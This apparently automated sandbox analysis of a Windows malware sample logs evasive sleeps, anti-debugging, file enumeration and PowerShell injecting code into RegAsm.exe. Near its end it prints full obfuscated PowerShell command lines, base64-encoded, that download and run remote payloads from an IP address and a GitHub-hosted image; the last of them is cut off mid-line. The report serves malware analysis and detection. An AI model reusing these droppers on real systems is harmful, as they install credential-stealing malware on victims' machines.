                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1363
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5709
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2420
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1010
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1742
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3103
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2416
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1686
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2297
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1520
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2271
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 463
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 9037
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: foregroundWindowGot 1695
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 864
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 967
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1278
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3252
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 7.2 %
                  Source: C:\Windows\System32\mshta.exe TID: 3476 Thread sleep time: -420000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3664 Thread sleep time: -300000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3756 Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3700 Thread sleep count: 5709 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3696 Thread sleep count: 2420 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3736 Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3740 Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3952 Thread sleep count: 1010 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3952 Thread sleep count: 1742 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3992 Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3972 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4032 Thread sleep count: 3103 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4028 Thread sleep count: 2416 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4076 Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4080 Thread sleep time: -6456360425798339s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4080 Thread sleep time: -600000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4048Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\System32\mshta.exe TID: 2760Thread sleep time: -420000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1592Thread sleep count: 1686 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1592Thread sleep count: 2297 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1372Thread sleep time: -180000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2452 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2688 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1888 Thread sleep count: 1520 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2140 Thread sleep count: 2271 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1256 Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2888 Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1040 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1484 Thread sleep count: 220 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1484 Thread sleep time: -110000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3008 Thread sleep count: 463 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3008 Thread sleep time: -1389000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2612 Thread sleep time: -180000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3008 Thread sleep count: 9037 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3008 Thread sleep time: -27111000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3604 Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3500 Thread sleep count: 864 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3496 Thread sleep count: 967 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3708 Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3608 Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3696 Thread sleep count: 1278 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3648 Thread sleep count: 3252 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3772 Thread sleep time: -3689348814741908s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3668 Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3772 Thread sleep time: -1800000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3772 Thread sleep time: -600000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3680 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,20_2_100010F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_10006580 FindFirstFileExA,20_2_10006580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0040AE51 FindFirstFileW,FindNextFileW,24_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 25_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,25_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 26_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,26_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,31_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,31_2_0041C322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,31_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,31_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,31_2_00408847
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_00407877 FindFirstFileW,FindNextFileW,31_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_0044E8F9 FindFirstFileExA,31_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,31_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,31_2_00419B86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,31_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,31_2_00407CD2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00418981 memset,GetSystemInfo,24_2_00418981
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
                  Source: wscript.exe, 0000000B.00000003.449845935.0000000000532000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.486671185.0000000000181000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: maBsUhaSJBQemUf@I[
                  Source: wscript.exe, 0000000B.00000003.451171058.00000000037B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.489557829.0000000003B31000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: maBsUhaSJBQemUf1g
                  Source: wscript.exe, 0000000B.00000003.451171058.00000000037B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.450474080.0000000003661000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.450500625.00000000002E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.488352569.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.488480055.0000000000518000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.489557829.0000000003B31000.00000004.00000020.00020000.00000000.sdmp, seethebestpricewithgoodcookiesme[1].tiff.5.dr, seethebestpricewithgoodcookiesm.vbS.5.dr Binary or memory string: maBsUhaSJBQemUf = "KkihOcWzULKLWxx"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node graph_25-34250
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_100060E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,24_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,31_2_0041CBE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_10004AB4 mov eax, dword ptr fs:[00000030h] 20_2_10004AB4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_00443355 mov eax, dword ptr fs:[00000030h] 31_2_00443355
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_1000724E GetProcessHeap,20_2_1000724E
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_10002639
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_10002B1C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_00434BD8 SetUnhandledExceptionFilter,31_2_00434BD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_0043503C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00434A8A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_0043BB71

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara match File source: Process Memory Space: powershell.exe PID: 3996, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTR
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 31_2_00412132
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_00419662 mouse_event,31_2_00419662
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EB6.tmp" "c:\Users\user\AppData\Local\Temp\sknmngfy\CSCD0FFB283197417ABFDFF0C5A9D2FBA3.TMP"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrecugakrnvunuylxcgmffi"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jurvurlefvnzyimponaoqrckug"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\toxfvjwftdfeaoitxynhtwpbdvhxj"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8131.tmp" "c:\Users\user\AppData\Local\Temp\lrugk233\CSC866FCE414411468EBBBEC22B5654CE3.TMP"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = 
